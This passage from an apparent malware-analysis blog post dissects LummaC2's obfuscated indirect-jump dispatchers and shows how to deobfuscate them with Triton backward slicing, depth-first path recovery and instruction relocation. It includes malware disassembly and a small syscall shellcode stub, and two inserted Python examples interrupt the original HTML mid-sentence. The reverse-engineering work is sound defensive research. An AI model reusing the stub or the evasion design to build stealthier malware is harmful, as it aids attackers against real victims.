The obfuscator implements this using three distinct dispatcher blocks linked with an arbitrary subset of dispatcher blocks that represent the loop body <ul> <li role="presentation"><strong style="vertical-align: baseline;">Initialization block</strong> <ul> <li role="presentation">Initializes the default branch target via an "exit condition" flag that is always set to false (so that execution is transferred to the start of the loop body)</li> </ul> </li> <li role="presentation"><strong style="vertical-align: baseline;">Update block</strong> <ul> <li role="presentation">Updates the exit condition flag based on the processing of either the initialization block or logic stemming from the loop body</li> </ul> </li> <li role="presentation"><strong style="vertical-align: baseline;">Exit-check block</strong> <ul> <li role="presentation">Checks whether the exit condition flag is either set to exit the loop or transfer execution back to the loop body</li> </ul> </li> </ul> </li> </ul> </li> <li role="presentation"><strong style="vertical-align: baseline;">Syscall logic</strong> <ul> <li role="presentation">This category is specific to a LummaC2 component that invokes Windows syscalls and disguises how the resulting <code><span style="vertical-align: baseline;">NTSTATUS</span></code><span style="vertical-align: baseline;"> code is verified. This is effectively a conditional dispatcher that implements the </span><code><span style="vertical-align: baseline;">NT_SUCCESS</span></code><span style="vertical-align: baseline;"> macro.</span></li> <li role="presentation">The following instruction sequences are used to determine the success of a syscall by negating the returned <code><span style="vertical-align: baseline;">NTSTATUS</span></code><span style="vertical-align: baseline;"> and inspecting its sign value. 
A value of 1 indicates a successful syscall while 0 indicates a failed syscall.</span> <ul> <li role="presentation"><code><span style="vertical-align: baseline;">not eax</span></code></li> <li role="presentation"><code><span style="vertical-align: baseline;">shr eax, 0x1F</span></code></li> </ul> </li> </ul> </li> </ol> <h4><span style="vertical-align: baseline;">Standard Conditional Dispatcher Type</span></h4> <p><span style="vertical-align: baseline;">Continuing with the case study sample from earlier, we find that the standard conditional dispatcher type occurs 987 times out of the 1,063 conditional dispatchers.</span></p> <p><span style="vertical-align: baseline;">Figure 10 </span><span style="vertical-align: baseline;">and Figure 11</span><span style="vertical-align: baseline;"> illustrate this type, with the conditional value tested against zero and against a non-zero constant, respectively. The first figure shows the conditional value being compared to 0 using a </span><code><span style="vertical-align: baseline;">test</span></code><span style="vertical-align: baseline;"> instruction. 
The second shows the conditional value being evaluated against the non-zero constant </span><code><span style="vertical-align: baseline;">0x5A4D</span></code><span style="vertical-align: baseline;"> using a </span><code><span style="vertical-align: baseline;">cmp</span></code><span style="vertical-align: baseline;"> instruction.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0041656E call sub_41C610              ; subroutine call at 0x41C610
00416573 mov esi, eax                 ; save the return value (eax) into esi
00416575 xor eax, eax                 ; clear out the index
00416577 test esi, esi                ; evaluate the result
00416579 setnz al                     ; Set al if conditional value is not zero
0041657C mov eax, off_457CF4[eax*4]   ; fetch appropriate encoded branch target
00416583 mov ecx, 0C09E0A35h          ; start the decoding sequence
00416588 xor ecx, dword_457CFC
0041658E add eax, ecx
00416590 inc eax
00416591 jmp eax                      ; transfer execution to the decoded
                                      ; branch value</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 10: </span><span style="vertical-align: baseline;">Conditional dispatcher with the conditional value being compared to 0</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0044DD15 movzx ecx, word ptr [edi]    ; fetch the 16-bit value to evaluate
0044DD18 xor edx, edx                 ; clear out the index
0044DD1A cmp ecx, 5A4Dh               ; compare to the 0x5A4D constant
0044DD20 setnz dl                     ; set the index to the result
0044DD23 mov ecx, off_46F304[edx*4]   ; fetch appropriate encoded branch target
0044DD2A mov edx, 9EC9743Dh           ; start the decoding sequence
0044DD2F xor edx, dword_46F30C
0044DD35 add ecx, edx
0044DD37 inc ecx
0044DD38 jmp ecx                      ; transfer execution to the decoded
                                      ; branch value</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: 
italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 11: </span><span style="vertical-align: baseline;">Conditional dispatcher with the conditional value being compared to a non-zero constant</span></span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Loop Conditional Dispatcher Type</span></h4> <p><span style="vertical-align: baseline;">Figure 12, Figure 13 and Figure 14 provide an illustration of a loop conditional dispatcher type, which occurs 42 times within the sample. It is always a collection of linked dispatcher blocks that include the loop initialization sequence, the loop body (an arbitrary collection of dispatcher blocks specific to the loop logic), an update condition block, and finally a check-exit condition block.</span></p> <p><span style="vertical-align: baseline;">The initialization block sets the stage for a loop by establishing an "exit condition" flag and initializing it to false, ensuring the loop body executes at least once. The update block then modifies this flag based on the results of the initialization block or the loop body's logic. 
Finally, the exit-check block examines the flag's state to determine whether to continue iterating or exit the loop.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0044CD55 mov dword_470A30, ebx
0044CD5B mov edi, [ebp-34h]
0044CD5E xchg ax, ax
0044CD60 mov eax, off_46CB3C
0044CD65 mov ecx, 74F906B5h
0044CD6A xor ecx, dword_46CB44
0044CD70 add eax, ecx
0044CD72 inc eax
0044CD73 mov dword ptr [ebp-30h], 0
0044CD7A mov dword ptr [ebp-18h], 0    ; conditional flag, initially 0 to
                                       ; reflect transfer to the loop body
                                       ; not the loop exit
0044CD81 mov dword ptr [ebp-28h], 0
0044CD88 mov dword ptr [ebp-40h], 0
0044CD8F jmp eax</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 12: A loop initialization block</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0044C108 mov ecx, [ebp-5Ch]
0044C10B mov eax, [ecx+1]
0044C10E add eax, ecx
0044C110 add eax, 5
0044C113 mov [ebp-18h], eax            ; instructions that update the
                                       ; conditional flag
0044C116 mov eax, off_46CFE4
0044C11B mov ecx, 681DADB7h
0044C120 xor ecx, dword_46CFEC
0044C126 add eax, ecx
0044C128 inc eax
0044C129 nop dword ptr [eax+00000000h]
0044C130 mov ecx, [ebp-18h]
0044C133 mov [ebp-28h], ecx
0044C136 jmp eax</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 13: </span><span style="vertical-align: baseline;">A loop update block</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0044C2AD xor eax, eax
0044C2AF mov edx, [ebp-18h]            ; evaluate the conditional flag
0044C2B2 test edx, edx
0044C2B4 setnz al
0044C2B7 mov ecx, 27DC8BC9h
0044C2BC xor ecx, dword_46D248
0044C2C2 mov eax, off_46D240[eax*4]    ; fetch the target
0044C2C9 add eax, ecx
0044C2CB inc eax
0044C2CC mov [ebp-28h], edx
0044C2CF mov ebx, [ebp-20h]
0044C2D2 jmp eax                       ; Jump back to a loop body block
                                       ; or exit the loop</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 14: </span><span style="vertical-align: baseline;">An exit-check block</span></span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Syscall Conditional Dispatcher Type</span></h4> <p><span style="vertical-align: baseline;">Dispatchers of this type are used for checking the return values of LummaC2-specific function calls that perform a syscall. They appear only 34 times in the case study sample. In these functions, LummaC2 decrypts the shellcode in </span><span style="vertical-align: baseline;">Figure 15</span><span style="vertical-align: baseline;"> and executes it in memory to make a particular syscall.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>mov eax, &lt;syscall ID&gt;
mov edx, win32u.Wow64SystemServiceCall
call edx
ret &lt;imm16&gt;</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 15: </span><span style="vertical-align: baseline;">Shellcode to invoke a Windows system call</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In other cases, the malware makes direct calls to Windows Native APIs instead of utilizing the shellcode in Figure 15.</span></p> <p><span style="vertical-align: baseline;">The conditional dispatcher for this type implements the </span><code><span style="vertical-align: baseline;">NT_SUCCESS</span></code><span style="vertical-align: baseline;"> macro by checking whether 
the returned </span><code><span style="vertical-align: baseline;">NTSTATUS</span></code><span style="vertical-align: baseline;"> code indicates success. </span><code><span style="vertical-align: baseline;">NT_SUCCESS(Status)</span></code><span style="vertical-align: baseline;"> is defined as </span><code><span style="vertical-align: baseline;">Status &gt;= 0</span></code><span style="vertical-align: baseline;">, so the test reduces to the sign bit: the dispatcher inverts the </span><code><span style="vertical-align: baseline;">NTSTATUS</span></code><span style="vertical-align: baseline;"> value and shifts its sign bit down into bit 0, which yields a branch target index of either 0 or 1. Any non-negative status (</span><code><span style="vertical-align: baseline;">STATUS_SUCCESS</span></code><span style="vertical-align: baseline;"> is 0, and informational codes are also non-negative) produces index 1 and takes the true branch; a status with the sign bit set (warning and error codes, such as those in the 0xC0000000 range) produces index 0 and takes the false branch.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>00424D95 call sub_44EDA0            ; wrapper function to perform a syscall
00424D9A add esp, 0Ch
00424D9D not eax                    ; negate all bits of the NTSTATUS return value
00424D9F shr eax, 1Fh               ; isolate the sign bit to capture the
                                    ; result and in turn, the index to
                                    ; the according branch
00424DA2 mov eax, off_45DC9C[eax*4] ; fetch the according branch target
00424DA9 mov ecx, 31637ACh
00424DAE xor ecx, dword_45DCA4
00424DB4 add eax, ecx
00424DB6 inc eax
00424DB7 jmp eax</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 16: </span><span style="vertical-align: baseline;">Conditional dispatcher to check syscall return values</span></span></p></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Obfuscated Function Recovery</span></h2> <h3><span style="vertical-align: baseline;">Original Instruction Recovery</span></h3> <p><span style="vertical-align: baseline;">Recovering the original control flow of a protected function requires us to differentiate between the obfuscator's injected dispatcher 
instructions and the function's original instructions. To solve this, we use symbolic backward slicing, a program analysis technique that identifies the instructions that influence the value of a specific register or memory location at a given point of a simulated execution over an intermediate representation. In this context, we employ backward slicing to do the following:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Isolate the dispatcher instructions from the original instructions</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Determine exactly which instructions compute the final indirect transfer of control</span></p> </li> </ul> <p><span style="vertical-align: baseline;">In our deobfuscator design, we leverage the </span><a href="https://triton-library.github.io/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Triton</span></a><span style="vertical-align: baseline;"> symbolic execution engine to conduct the core of the recovery. Triton implements </span><a href="https://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/backward_slicing.py" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">backward tracing APIs</span></a><span style="vertical-align: baseline;"> that we can use directly. When executing the program, Triton maintains a set of symbolic expressions that represent the values of registers and memory addresses. These expressions are stored as an Abstract Syntax Tree (AST), where each tree node represents an operation with operands that result from the execution flow. 
Triton calls this step "processing": the register and memory effects of each emulated instruction are simulated and folded into the AST, so after a run of instructions the AST reflects their cumulative effect.</span></p> <p><span style="vertical-align: baseline;">This is a powerful abstraction that allows us to reason about the deobfuscation at an AST level and ignore the verbose disassembly produced by the obfuscator. </span></p> <p><span style="vertical-align: baseline;">To distinguish dispatcher instructions, we'll focus on the destination of the final indirect jump in a dispatcher block. By looking up this destination in the constructed ASTs after all dispatcher instructions are processed, we can extract its corresponding symbolic expressions. </span></p> <p><span style="vertical-align: baseline;">Figure 17</span><span style="vertical-align: baseline;"> shows the AST of the destination register </span><code><span style="vertical-align: baseline;">eax</span></code><span style="vertical-align: baseline;"> at an indirect jump. 
This AST represents all symbolic expressions from the result of the symbolic processing of the corresponding instructions that influence the value of the destination register before the indirect jump is executed.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig17.max-1000x1000.png" alt="ASTs of the destination register after the indirect jump instruction is processed"> </a> <figcaption class="article-image__caption "><p data-block-key="s2elm">Figure 17: ASTs of the destination register after the indirect jump instruction is processed</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Using Triton's APIs, we can extract a subset (or slice) of the processed expressions that collectively contribute to the final destination address of an indirect jump. For each expression in the slice, we can map it back to the specific dispatcher instruction that generates it. 
This mapping is possible because Triton maintains the association between instructions and the symbolic expressions they produce during its execution.</span></p> <p><span style="vertical-align: baseline;">A snippet of the code used to perform backward slicing to distinguish dispatcher instructions from the original ones is shown in </span><span style="vertical-align: baseline;">Figure 18</span><span style="vertical-align: baseline;">.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>from triton import Instruction, OPCODE, OPERAND

# `context` is the TritonContext and `pc` the current program counter,
# both set up by the surrounding emulation loop

# Retrieve the bytes of the instruction at the current program counter
instructionBytes = context.getConcreteMemoryAreaValue(pc, 16)

# Create a Triton Instruction object from the retrieved bytes
instruction = Instruction(pc, instructionBytes)

# Process the instruction using the Triton context
context.processing(instruction)

# Scan for dispatcher jump instruction
if instruction.getType() == OPCODE.X86.JMP:
    # Extract the operand of the JMP instruction
    jmpOperand = instruction.getOperands()[0]

    # Process JMP instructions with register operand only
    if jmpOperand.getType() == OPERAND.REG:
        # Get symbolic expression of destination register
        destRegExpression = context.getSymbolicRegisters()[jmpOperand.getId()]

        # Backward slice on the destination register
        slicing = context.sliceExpressions(destRegExpression)

        # Iterate through the slice in expression order
        for _, sliceInstr in sorted(slicing.items()):
            # Print out the disassembled instruction of each slice
            sliceInstrDisassembly = sliceInstr.getDisassembly()
            print('\t[Slice]', sliceInstrDisassembly)</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 18: </span><span style="vertical-align: baseline;">Triton code to perform backward slicing to recover all dispatcher instructions</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: 
baseline;">Here, we continuously execute instructions until a <code>jmp</code></span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instruction is encountered. If the instruction's operand is a register, we retrieve its set of symbolic expressions and perform a backward slice to recover all instructions that influenced its result. Triton allows us to further preserve the original disassembly given a set of symbolic expressions that we leverage to extract the exact dispatcher instructions that produce the slice, and not merely the AST representation.</span></p> <p><span style="vertical-align: baseline;">Once the complete backward slice for the destination has been retrieved, we can confidently distinguish the dispatcher instructions from the original instructions within the function. This distinction holds true regardless of the placement or order of the dispatcher instructions within a protected block since the backward slice only monitors those instructions that directly influence the final value.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Backward slicing output: ... 
[Processing] 0x416530: lea eax, [esp + 8]
[Processing] 0x416534: push eax
[Processing] 0x416535: call dword ptr [0x454a18]
[Processing] 0x41653b: mov eax, esp
[Processing] 0x41653d: push eax
[Processing] 0x41653e: call dword ptr [0x454a14]
[Processing] 0x416544: mov eax, dword ptr [0x457c1c]
[Processing] 0x416549: mov ecx, 0xa15bd01f
[Processing] 0x41654e: xor ecx, dword ptr [0x457c24]
[Processing] 0x416554: add eax, ecx
[Processing] 0x416556: inc eax
[Processing] 0x416557: jmp eax
    [Slice] 0x416544: mov eax, dword ptr [0x457c1c]
    [Slice] 0x416549: mov ecx, 0xa15bd01f
    [Slice] 0x41654e: xor ecx, dword ptr [0x457c24]
    [Slice] 0x416554: add eax, ecx
    [Slice] 0x416556: inc eax
...</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 19: </span><span style="vertical-align: baseline;">Output for the code in </span><span style="vertical-align: baseline;">Figure 18</span><span style="vertical-align: baseline;"> to distinguish dispatcher instructions</span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Control Flow Recovery</span></h3> <p><span style="vertical-align: baseline;">In addition to recovering all original instructions of the function, we must also recover the original control flow. While instructions are processed dynamically, Triton allows us to determine the concrete destination value of the final indirect jump in the dispatcher block. With this, we can trace the program's execution flow and reconstruct the order in which dispatcher blocks are executed.</span></p> <p><span style="vertical-align: baseline;">To explore all possible execution paths within the function, we employ a depth-first search (DFS) traversal algorithm. 
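The slice in Figure 19 can be reproduced with a plain def-use walk that makes the kill rule explicit: an instruction enters the slice only if it defines a location that is still wanted, and its definition removes that location from the wanted set, which is why the early lea, push and call instructions stay out even though they write eax. The following is an added example and not the authors' tooling or Triton itself; it models a handful of x86 mnemonics with (defs, uses) sets, assumes that a call clobbers the caller-saved registers eax, ecx and edx, and runs over the Figure 19 instructions embedded as a constructed trace.

```python
import re

# Registers tracked by name; a memory operand is tracked as "mem[...]".
REG = re.compile(r"\b(eax|ebx|ecx|edx|esi|edi|esp|ebp)\b")

# Constructed trace: the instructions from Figure 19 in execution order.
TRACE = [
    (0x416530, "lea eax, [esp + 8]"),
    (0x416534, "push eax"),
    (0x416535, "call dword ptr [0x454a18]"),
    (0x41653b, "mov eax, esp"),
    (0x41653d, "push eax"),
    (0x41653e, "call dword ptr [0x454a14]"),
    (0x416544, "mov eax, dword ptr [0x457c1c]"),
    (0x416549, "mov ecx, 0xa15bd01f"),
    (0x41654e, "xor ecx, dword ptr [0x457c24]"),
    (0x416554, "add eax, ecx"),
    (0x416556, "inc eax"),
    (0x416557, "jmp eax"),
]


def read_locs(operand):
    """Locations read to evaluate an operand: its registers plus, for a
    memory operand, the memory cell named by the bracketed expression."""
    locs = set(REG.findall(operand))
    if "[" in operand:
        locs.add("mem" + operand[operand.index("["):])
    return locs


def effects(text):
    """(defs, uses) for the x86 subset in the trace. A call is assumed to
    clobber the caller-saved registers eax, ecx and edx (ABI assumption)."""
    mnem, _, rest = text.partition(" ")
    ops = [o.strip() for o in rest.split(",")] if rest else []
    if mnem == "mov":
        return {ops[0]}, read_locs(ops[1])
    if mnem == "lea":                      # address arithmetic only, no load
        return {ops[0]}, set(REG.findall(ops[1]))
    if mnem in ("add", "sub", "xor", "and", "or", "shr", "shl"):
        return {ops[0]}, {ops[0]} | read_locs(ops[1])
    if mnem in ("inc", "dec", "not", "neg"):
        return {ops[0]}, {ops[0]}
    if mnem == "push":
        return {"esp"}, {"esp"} | read_locs(ops[0])
    if mnem == "call":
        return {"eax", "ecx", "edx", "esp"}, {"esp"} | read_locs(ops[0])
    if mnem == "jmp":
        return set(), read_locs(ops[0])
    raise ValueError(f"unsupported instruction: {text}")


def backward_slice(trace, criterion):
    """Walk the trace backwards, keeping every instruction that defines a
    location still wanted. A definition kills the location, so an earlier
    definition that was later overwritten stays out of the slice."""
    wanted = set(criterion)
    kept = []
    for addr, text in reversed(trace):
        defs, uses = effects(text)
        if defs & wanted:
            kept.append((addr, text))
            wanted = (wanted - defs) | uses
    kept.reverse()
    return kept


def dispatcher_slice(trace):
    """Slice on the register operand of the trailing indirect jmp, as the
    Triton snippet does on the destination register's expression."""
    _, text = trace[-1]
    mnem, _, operand = text.partition(" ")
    if mnem != "jmp" or not REG.fullmatch(operand):
        raise ValueError(f"trace does not end in an indirect jmp: {text}")
    return backward_slice(trace[:-1], {operand})


if __name__ == "__main__":
    for addr, text in dispatcher_slice(TRACE):
        print(f"[Slice] {addr:#x}: {text}")
```

Triton performs the same walk over symbolic expressions and therefore also follows values through memory, including stack slots written by push and spilled locals such as the [ebp-28h] store in Figure 14. This toy only names memory cells by their operand text and ignores the stack writes of push and call, so a dispatcher that stages its index through the stack would need those effects modelled before its slice could be trusted.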
</span></p> <p><span style="vertical-align: baseline;">We begin by exploring a single path, following the control flow dictated by the obfuscator's indirect jumps. This continues until the path reaches a termination point, such as a <code>ret</code></span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instruction or a program-ending API call (e.g., </span><code><span style="vertical-align: baseline;">ExitProcess</span></code><span style="vertical-align: baseline;">).</span></p> <p><span style="vertical-align: baseline;">In our deobfuscator design, we default to viewing all of these protected jumps as <code>jnz</code></span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instructions by forcing the index register to be 1 in the main execution path being processed. When encountering a protected conditional jump, we assume the condition is met and continue exploring the path that follows the jump. However, we don't discard the alternative path. The alternative path is stored in a queue-like data structure. This allows us to revisit these paths later when we've exhausted all possibilities on the current path.</span></p> <p><span style="vertical-align: baseline;">By systematically exploring all paths using DFS and handling conditional jumps strategically, we can reconstruct the original control flow that has been obfuscated with the compiler's indirect jumps.</span></p> <h2><span style="vertical-align: baseline;">Deobfuscation: Rebuilding Original Function</span></h2> <p><span style="vertical-align: baseline;">With the original instructions and execution paths identified, we can deobfuscate the sample by rebuilding the functions we have processed. 
Our goal is to ensure the deobfuscated functions are restored to their original state, preserving their original semantics and removing all traces of the obfuscator.</span></p> <h3><span style="vertical-align: baseline;">Instruction Rewriting</span></h3> <p><span style="vertical-align: baseline;">When rebuilding, we can overwrite the original protected function with the deobfuscated instructions. Since the rebuilt function always has fewer instructions than the protected one (every dispatcher block collapses to at most a direct conditional jump followed by a direct jump), there is guaranteed space to accommodate the rebuilt function. The remaining space can be padded with standard compiler padding bytes such as </span><code><span style="vertical-align: baseline;">0xCC</span></code><span style="vertical-align: baseline;"> (</span><code><span style="vertical-align: baseline;">int3</span></code><span style="vertical-align: baseline;">).</span></p> <p><span style="vertical-align: baseline;">The rewriting process involves writing instructions back from the function's entry point in the order they are processed and executed during the Triton analysis, excluding all dispatcher instructions. Here, we will address two specific cases involving indirect jumps originally added by the obfuscator.</span></p> <p><span style="vertical-align: baseline;">The first case involves processing an unconditional dispatcher block. For this case, if the jump target has not been written yet, we simply drop the jump and continue writing the target's instructions immediately after, turning the jump into a fall-through. If the jump target has already been written, we replace the indirect jump with a direct one to branch back to that target.</span></p> <p><span style="vertical-align: baseline;">The second case for handling the jump instruction of a conditional dispatcher block is a bit more convoluted. 
Before tackling this, we must determine the original conditional jump type (e.g., </span><code><span style="vertical-align: baseline;">jz</span></code><span style="vertical-align: baseline;">,</span><strong style="vertical-align: baseline;"> </strong><code><span style="vertical-align: baseline;">jnz</span></code><span style="vertical-align: baseline;">, </span><code><span style="vertical-align: baseline;">jl</span></code><span style="vertical-align: baseline;">) based on the preceding </span><code><span style="vertical-align: baseline;">setcc</span></code><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">dispatcher instruction.</span></p> <p><span style="vertical-align: baseline;">Since the indirect jump can target one of the two destinations given a condition, we must replace it with two instructions. The first instruction is a conditional jump to the first destination using the correct conditional jump type.</span></p> <p><span style="vertical-align: baseline;">The second instruction can be either:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A conditional jump with the opposite type as the first, targeting the second destination.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A direct jump to the second destination. 
This is chosen for simplicity of our deobfuscator implementation.</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0041652B call sub_4455F0      ; original instruction
00416530 movzx eax, al        ; eax = al = return value
00416533 test eax, eax        ; set flags
00416535 jnz loc_416540       ; replacing indirect jmp with jnz for the first path
0041653B jmp loc_416554       ; insert a jmp for the second path</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 20: </span><span style="vertical-align: baseline;">Replacing an indirect conditional jump with a </span><code><span style="vertical-align: baseline;">jnz-jmp</span></code><span style="vertical-align: baseline;"> instruction pair</span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Offset Relocation</span></h3> <p><span style="vertical-align: baseline;">The final step, relocation, addresses a remnant from our rebuilding process. As we remove dispatcher instructions and duplicated instructions, the rewritten instructions will occupy different locations from where they were in the original function. This displacement throws off the offsets of jump, call, and other memory-referencing instructions that are not position-independent, as they now need to refer to memory locations from their new addresses.</span></p> <p><span style="vertical-align: baseline;">In our current implementation, we address this by parsing all of the memory-referencing instructions and calculating their correct offsets after deobfuscation. This involves tracking both the original and relocated addresses of each instruction. 
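Taken together, the rewriting rules and the relocation pass can be sketched as one small program. This is an added example and not the authors' deobfuscator: it starts from the recovered view that the slicing step produces (per block, the original instructions with dispatcher code already removed, the dispatcher kind, its concrete destinations and the jcc mnemonic recovered from the setcc), follows the taken path first while parking the other destination on a worklist, emits the jcc/jmp pair of Figure 20, and then recomputes every rel32 from the new layout. The four-block function, its byte encodings, and the choice of rel32 encodings for the inserted jumps are constructed for the example.

```python
from dataclasses import dataclass

# Encodings assumed for the inserted direct jumps: jmp rel32 is E9 rel32,
# conditional jumps are 0F 8x rel32 (a real assembler might pick rel8 forms).
JCC_OPCODE = {"jz": 0x84, "jnz": 0x85, "jl": 0x8C, "jge": 0x8D, "jle": 0x8E, "jg": 0x8F}


@dataclass
class Insn:
    text: str
    code: bytes          # encoding; the last 4 bytes are a rel32 when reloc is set
    reloc: int = None    # absolute address the rel32 must reach after relocation


@dataclass
class Block:
    insns: list          # original instructions, dispatcher instructions already sliced away
    kind: str            # "jmp", "jcc" or "ret"
    targets: tuple = ()  # jmp: (target,)   jcc: (taken, fallthrough)
    cond: str = ""       # jcc mnemonic recovered from the preceding setcc


def direct_jump(mnem, target):
    opcode = b"\xe9" if mnem == "jmp" else bytes([0x0F, JCC_OPCODE[mnem]])
    return Insn(f"{mnem} {target:#x}", opcode + bytes(4), reloc=target)


def rebuild(blocks, entry):
    """Depth-first rewrite: follow the taken path first, park the other
    destination on a worklist, replace each indirect jump with direct ones.
    Returns (out, labels); labels maps an original block address to the
    index in out where that block's rewritten code starts."""
    out, labels, written, worklist = [], {}, set(), [entry]
    while worklist:
        cur = worklist.pop()
        if cur in written:
            continue
        while True:                                   # one path to its end
            written.add(cur)
            labels[cur] = len(out)
            blk = blocks[cur]
            out.extend(blk.insns)
            if blk.kind == "ret":
                break
            if blk.kind == "jcc":
                taken, other = blk.targets
                out.append(direct_jump(blk.cond, taken))  # jcc to the first destination
                out.append(direct_jump("jmp", other))     # jmp to the second destination
                worklist.append(other)                    # explored once this path ends
                if taken in written:
                    break
                cur = taken
                continue
            (nxt,) = blk.targets
            if nxt in written:                            # already placed: branch back
                out.append(direct_jump("jmp", nxt))
                break
            cur = nxt                                     # not yet placed: fall into it


    return out, labels


def relocate(out, labels, base):
    """Lay the rewritten instructions out from base and re-encode each rel32
    from its new location. Returns [(new_address, text, bytes)]."""
    addrs, pos = [], base
    for ins in out:
        addrs.append(pos)
        pos += len(ins.code)
    new_addr_of = {blk: addrs[i] for blk, i in labels.items()}
    rows = []
    for ins, addr in zip(out, addrs):
        code = ins.code
        if ins.reloc is not None:
            target = new_addr_of.get(ins.reloc, ins.reloc)  # block label, else external
            rel = (target - (addr + len(code))) & 0xFFFFFFFF
            code = code[:-4] + rel.to_bytes(4, "little")
        rows.append((addr, ins.text, code))
    return rows


def assemble(rows, size):
    """Concatenate the relocated bytes and pad the rest of the original
    function's space with 0xCC (int3)."""
    body = b"".join(code for _, _, code in rows)
    if len(body) > size:
        raise ValueError("rebuilt function does not fit in the original space")
    return body + b"\xcc" * (size - len(body))


# Constructed four-block function modelled on Figure 20 (not taken from the sample).
ENTRY = 0x416500
BLOCKS = {
    0x416500: Block([Insn("call 0x4455f0", b"\xe8" + bytes(4), reloc=0x4455F0),
                     Insn("movzx eax, al", b"\x0f\xb6\xc0"),
                     Insn("test eax, eax", b"\x85\xc0")],
                    "jcc", (0x416540, 0x416554), cond="jnz"),
    0x416540: Block([Insn("mov eax, 1", b"\xb8\x01\x00\x00\x00")], "jmp", (0x416570,)),
    0x416554: Block([Insn("xor eax, eax", b"\x33\xc0")], "jmp", (0x416570,)),
    0x416570: Block([Insn("ret", b"\xc3")], "ret"),
}

if __name__ == "__main__":
    out, labels = rebuild(BLOCKS, ENTRY)
    for addr, text, code in relocate(out, labels, ENTRY):
        print(f"{addr:08X} {code.hex():<14} {text}")
```

Running the module prints the relocated listing. In the constructed input the call's rel32 is recomputed from its new address even though the callee did not move, and the final jmp back to the ret block becomes a negative displacement. The addrs table that relocate builds, resolved through labels, is the original-to-relocated address mapping that the relocation step relies on.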
With this information, we can calculate the adjusted offset to reach the target memory reference and craft the correct opcode for each instruction.</span></p> <h2><span style="vertical-align: baseline;">Final Result</span></h2> <p><span style="vertical-align: baseline;">By employing techniques described in this blog post, we have successfully developed a deobfuscation tool for this version of LummaC2. In the following figures, we see the result of our deobfuscator lifting the protection from two protected functions in the case study sample.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig21.max-1000x1000.png" alt="Disassembly view of the subroutine at the binary&#x27;s entrypoint before deobfuscation"> </a> <figcaption class="article-image__caption "><p data-block-key="8nnet">Figure 21: Disassembly view of the subroutine at the binary's entrypoint before deobfuscation</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col 